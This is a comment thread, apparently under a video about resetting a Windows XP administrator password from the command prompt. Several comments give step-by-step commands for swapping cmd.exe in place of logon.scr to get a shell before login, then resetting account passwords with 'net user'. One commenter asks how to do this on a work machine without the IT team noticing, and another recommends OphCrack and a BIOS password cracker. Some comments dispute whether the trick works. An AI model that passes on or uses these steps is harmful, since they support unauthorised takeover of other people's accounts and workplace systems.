Oh, it’s totally hacking because he’s using the command prompt ;)
An admin can click on any user’s account in the User Accounts control panel and change that user’s password without knowing what it was set to previously.
It’s only different when you are changing your own password: User Accounts asks for your old password so that you don’t “lose all EFS-encrypted files, personal certificates, and stored passwords for Web sites or network resources.”
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/usercpl_overview.mspx?mfr=true
Seeing as an admin can delete any user’s account or view files of any user’s account anyway, the ability to change any user’s password isn’t so special, especially if you keep the caveats in mind.

wait a minute, so the administrator is already logged on (yes, in the video, the user “owner” is an administrator), and using that account, he changes his own password. well, since you have access to the admin account sitting right there in front of you – why stop at that? install a keylogger, load up a malicious kernel mode driver, delete ntdll.dll! how is this hacking when you have direct physical access to the computer *with* the administrator already logged on?

I tested this…it works when you have local admin rights, but not when you don’t!!!
I created a user account, logged in, then attempted to change the local administrator password using the instructions in the video. It doesn’t work.
So this is not true…

Ya know what’s scary about that? The fact that it ain’t XP (at least judging from the interface), but Vista. Nice to know what kind of security is on the horizon {sarcasm mode turned off}.

@ the other Steve:
I think he just has a visual style applied to look like Vista, but its probably just XP. If you look at the Start menu, its not like the new Vista.

This is not hack he just changed admin password ,on which he was allready loged using promt,he bypassed entering old one.Real hack is this:If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
“net user password”
If the Administrator Account is called AoX and you want the password 123 enter this
“net user AoX 123″

hi buddy
my problem is that at work my machine has limited account, so when I use internet, I can download files but I can’t see or use them.
I learnt from you how to hack the administrator’s password but I wonder If I can return it to the original password or not, because when guys from Informatic team come to install a software, for example, they will see that their password doesn’t work and they’ll kick my ass. is there a way NOT TO CHANGE THE PASSWORD BUT TO RECOGNIZE IT ?

To change any account password even if you are a guest do this:
Open A Command Prompt And Type All Of This
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
net user (Username Here) (Password Here)
example -
net user Chris greatpassword
**************************
That’s all you do, just login to the account and you have your new password!
All you have to do now is go back to the folder “temphack” and copy the cmd.exe and logon.scr back into C”\WINDOWS\system32\ and click “yes” to overwrite files.

Hey AOX and Chris,
I don’t think ur hack is very cool. I’m sure that you didn’t attempted this hack on your computer. I tried this hack 3 times with Windows XP Operating System. The fact you didn’t know is, “When you delete Logon.scr, Windows automatically generates another copy of logon screensaver. Now I know the solution to overcome that. Copy cmd.exe to temphack folder. rename cmd.exe to logon.scr. copy it to System32 folder. It will ask you if you want to replace the orginal file logon.scr, click yes. This way we can fool windows that logon.scr is actually present there. But the real problem does not comes here. Windows XP does not actually gives Administrative rights at Welcome screen. You will only get a command prompt with Limited rights. That means you cannot use the NET command. pls e-mail me, if anybody finds a solution to this problem.

you just can’t hack the admin password from any of the above trick if u have “limited” privileges…
-> Real hack is to download a copy of “OPHCrack” a linux distro -> boot and it will do the rest…
-> If the boot sequence is not set to CD/DVD then you set it up from the BIOS.
-> If BIOS is password protected u can use “CMOS Cracker” to crack the BIOS password :)
